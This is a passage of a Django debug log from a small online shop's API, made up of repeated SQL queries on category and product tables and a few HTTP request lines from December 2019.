(0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 09:37:23,674 utils 4252 140031721535232 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 09:37:23] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-18 09:37:39,222 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 09:37:39,228 utils 4252 140031721535232 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 09:37:39] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-18 09:41:29,302 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:41:29,310 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:41:29,316 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:41:29,318 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:41:29,323 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:41:29,326 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:41:29,328 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:41:29,331 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:41:29,333 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:41:29,337 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:41:29,340 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:41:29,342 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:41:29,345 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:41:29,347 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:41:29,351 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:41:29,353 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:41:29,355 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:41:29,357 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:41:29,360 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:41:29,363 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:41:29,365 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:41:29,368 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:41:29,370 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:41:29,372 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:41:29,375 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:41:29,380 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:41:29,382 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:41:29,384 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:41:29,387 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:41:29,390 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:41:29,393 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:41:29,395 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:41:29,398 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:41:29,400 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:41:29,402 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:41:29,406 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:41:29,408 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:41:29,411 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:41:29,413 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:41:29,415 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:41:29,418 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:41:29,421 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:41:29,424 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:41:29,427 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:41:29,430 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:41:29,432 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:41:29] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [18/Dec/2019 09:41:45] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 09:42:05,692 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:42:05,701 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:42:05,705 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:42:05,707 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:42:05,712 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:42:05,714 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:42:05,717 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:42:05,722 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:42:05,726 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:42:05,732 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:42:05,737 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:42:05,741 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:42:05,745 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:42:05,749 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:42:05,755 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:42:05,759 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:42:05,763 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:42:05,768 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", 